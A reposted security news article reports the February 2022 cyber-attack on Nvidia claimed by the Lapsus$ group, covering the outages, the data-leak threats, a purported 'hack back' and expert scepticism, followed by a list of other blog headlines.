https://www.blackhatethicalhacking.com/wp-content/uploads/2021/08/Untitled-design-2-1.png Cyber-attack on Nvidia linked to Lapsus$ ransomware gang<svg<path31 total views,  31 views today
https://www.blackhatethicalhacking.com/wp-content/uploads/2022/02/Patreon.png
Reading Time: 1 Minute
The Lapsus$ ransomware gang has allegedly claimed responsibility for a cyber-attack against graphics chipmaking giant Nvidia.
Breaking the story on Friday (February 25), The Telegraph reported that attackers had compromised Nvidia’s internal systems over the previous two days, causing outages of its developer tools and email systems.

The newspaper added that an insider had said parts of its email systems had started working normally by Friday.

Nvidia, which launched the world’s first graphics processing unit (GPU) in 1999, has intimated that the business has not been operationally disrupted.

“We are investigating an incident,” a spokesperson told The Daily Swig. “Our business and commercial activities continue uninterrupted. We are still working to evaluate the nature and scope of the event and don’t have any additional information to share at this time.”

There’s no evidence that the incident is connected to Russia’s ongoing invasion of Ukraine.
See Also: Complete Offensive Security and Ethical Hacking Course Lapsus$ claimsBloomberg reported on Friday that the incident appeared to involve a “relatively minor” ransomware attack, according to sources.

Then on Saturday morning (February 26), dark web intel outfit DarkTracer tweeted screenshots that purportedly showed messages from Lapsus$ actors claiming they had leaked password hashes for NVIDIA employees.

In the messages the attackers also revealed plans to release 1TB of stolen data soon, potentially in five batches, if Nvidia it didn’t pay up.

The next day, on Sunday (February 28), ‘infosec enthusiast’ Soufiane Tahiri posted additional screenshots supposedly showing Lapsus$ announcing the first data dump, comprising “source code and highly confidential/secret data”.
See Also: Kali Linux 2022.1 Release with Visual Updates, New Tools, Legacy SSH According to Emsisoft threat analyst Brett Callow, Lapsus$ claimed that Nvidia had “successfully hacked back”. Callow posted screenshots apparently showing the group explaining that the company had connected to the attackers’ virtual machine and encrypted its data.

However, security expert Marcus Hutchins responded: “To me this sounds a lot like LAPSUS$ installed Nvidia’s corporate agent on their own machine then triggered a data loss prevention policy, which they mistook for ransomware because they’re morons.”

Lapsus$ only announced itself at the turn of the year with attacks on Portuguese media conglomerate Impresa and various other targets. See Also: Recon Tool: Metagoofil Are u a security researcher? Or a company that writes articles or write ups about Cyber Security, Offensive Security (related to information security in general) that match with our specific audience and is worth sharing?

If you want to express your idea in an article contact us here for a quote: info@blackhatethicalhacking.com
See Also: How ILOVEYOU worm became the first global computer virus pandemic Source: portswigger.net Source Linkhttps://www.blackhatethicalhacking.com/wp-content/uploads/2022/01/merch.png Recent News* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/02/GettyImages-802535150-1-90x90.jpg Conti ransomware’s internal chats leaked after siding with Russia1 day ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/202[...]
Hacking Articles Tips Tricks Videos Tutorials
Black Hat Ethical Hacking Cyber-attack on Nvidia linked to Lapsus$ ransomware gang https://www.blackhatethicalhacking.com/wp-content/uploads/2021/08/Untitled-design-2-1.png Cyber-attack on Nvidia linked to Lapsus$ ransomware gang<svg<path31 total views,  31 views…
2/02/6469-article-220223-ukraine-body-text-90x90.jpg Data wiper deployed in cyber-attacks targeting Ukrainian systems4 days ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/02/T8F9rL5Ub6TRWHtQwsVCK6-1200-80-90x90.jpg Samsung Shattered Encryption on 100M Phones5 days ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/02/4346-article-220222-airtags-body-text-90x90.jpg AirTag clone bypassed Apple’s tracking-protection features, claims researcher6 days ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/02/Banner-Img-AWS-90x90.jpg Introducing Ghostbuster – AWS security tool protects against dangling elastic IP takeovers1 week ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/02/zabbix_blog_java-apps-90x90.png Critical vulnerabilities in Zabbix Web Frontend allow authentication bypass, code execution on servers1 week ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/02/ezgif.com-gif-maker-4-1-90x90.jpg GitHub code scanning now finds more security vulnerabilities2 weeks ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/02/012qzWe52HXVPxkc8nUrPyv-1.fit_lim.size_1200x630.v1617817629-90x90.jpg Massive LinkedIn Phishing, Bot Attacks Feed on the Job-Hungry2 weeks ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/02/Unredacter-Pixelize-90x90.gif New tool can uncover redacted, pixelated text to reveal sensitive data2 weeks ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/02/ezgif.com-gif-maker-3-1-90x90.jpg Adobe: Zero-Day Magento 2 RCE Bug Under Active Attack2 weeks ago <svg<path30 total views,  30 views today
The post Cyber-attack on Nvidia linked to Lapsus$ ransomware gang first appeared on Black Hat Ethical Hacking.
No Rate Limiting on Forget Password Page (Email Triggering)

Vulnerability Category: A6- Security MisconfigurationContinue reading on Medium »
Read more...
What After 12th? as an Ethical Hacker.

This is not an accurate path for an ethical hacker.Continue reading on Medium »
Read more...